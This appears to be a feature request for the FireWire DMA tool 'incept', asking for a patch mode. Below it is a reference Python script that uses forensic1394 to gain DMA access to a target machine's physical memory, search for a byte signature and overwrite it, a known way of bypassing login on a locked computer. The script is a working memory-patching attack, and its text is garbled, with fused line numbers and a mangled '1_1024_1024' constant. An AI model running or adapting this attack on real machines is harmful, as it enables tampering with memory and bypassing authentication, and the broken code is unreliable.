Implement patch mode so that it is easy to test new sigs:
incept --patch signature patch offset
Like the reference implementation:
1 # !/ usr / bin / env python
2 # -- coding : utf -8 --
3 from forensic1394 import Bus
4 from time import sleep
5 from binascii import unhexlify
6 from sys import argv
7
8 # Page size , nearly always 4096 bytes
9 PAGESIZE = 4096
10
11 def findsig (d , sig , off ):
12 # Skip the first 1 MiB of memory
13 addr = 1_1024_1024 + off
14 while True :
15 # Prepare a batch of 128 requests
16 r = [( addr + PAGESIZE *i , len ( sig )) for i in range (0 , 128)]
17
18 for caddr , cand in d. readv (r ):
19 if cand == sig : return caddr
20
21 addr += PAGESIZE * 128
22
23 # Parse the command line arguments
24 sig , patch , off = unhexlify ( argv [1]) , unhexlify ( argv [2]) , int ( argv [3])
25
26 b = Bus ()
27
28 # Enable SBP -2 support to ensure we get DMA
29 b. enable_sbp2 ()
30 sleep (2.0)
31
32 # Open the first device
33 d = b. devices ()[0]
34 d. open ()
35
36 try :
37 # Find
38 addr = findsig (d , sig , off )
39 print " Signature found at %d. " % ( addr )
40
41 # Patch and verify
42 d. write ( addr , patch )
43 assert d. read ( addr , len ( patch )) == patch
44 except IOError :
45 print " Signature not found . "